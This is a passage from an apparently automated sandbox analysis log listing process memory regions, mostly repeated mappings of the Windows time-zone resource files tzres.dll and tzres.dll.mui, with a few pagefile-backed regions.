"pagefile_0x0000000000130000" filename = "" Region: id = 4136 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4137 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4138 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4139 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4140 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4141 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4142 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4143 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4144 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4145 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4146 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4147 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4148 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4149 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4150 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4151 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4152 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4153 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4154 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4155 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4156 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4157 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4158 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4159 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4160 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4161 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4162 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4163 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4164 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4165 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4166 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4167 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4168 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4169 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4170 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4171 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4172 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4173 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4174 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4175 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4176 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4177 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4178 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4179 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4180 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4181 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4182 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4183 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4184 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4185 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4186 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4187 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4188 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4189 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4190 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4191 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4192 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4193 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4194 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4195 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4196 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4197 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4198 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4199 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4200 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4201 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4202 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4203 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4204 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4205 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4206 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4207 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4208 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4209 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4210 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4211 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4212 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4213 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4214 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4215 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4216 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4217 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4218 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4219 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4220 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4221 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4222 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4223 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4224 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4225 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4226 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4227 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4228 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4229 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4230 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4231 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4232 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4233 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4234 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4235 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4236 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4237 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4238 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4239 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4240 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4241 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4242 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4243 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4244 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4245 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4246 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4247 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4248 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4249 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4250 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4251 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4252 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4253 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4254 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4255 start_va = 0x160000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4256 start_va = 0x150000 end_va = 0x155fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 4257 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 4258 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 4259 start_va = 0x160000 end_va = 0x160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = 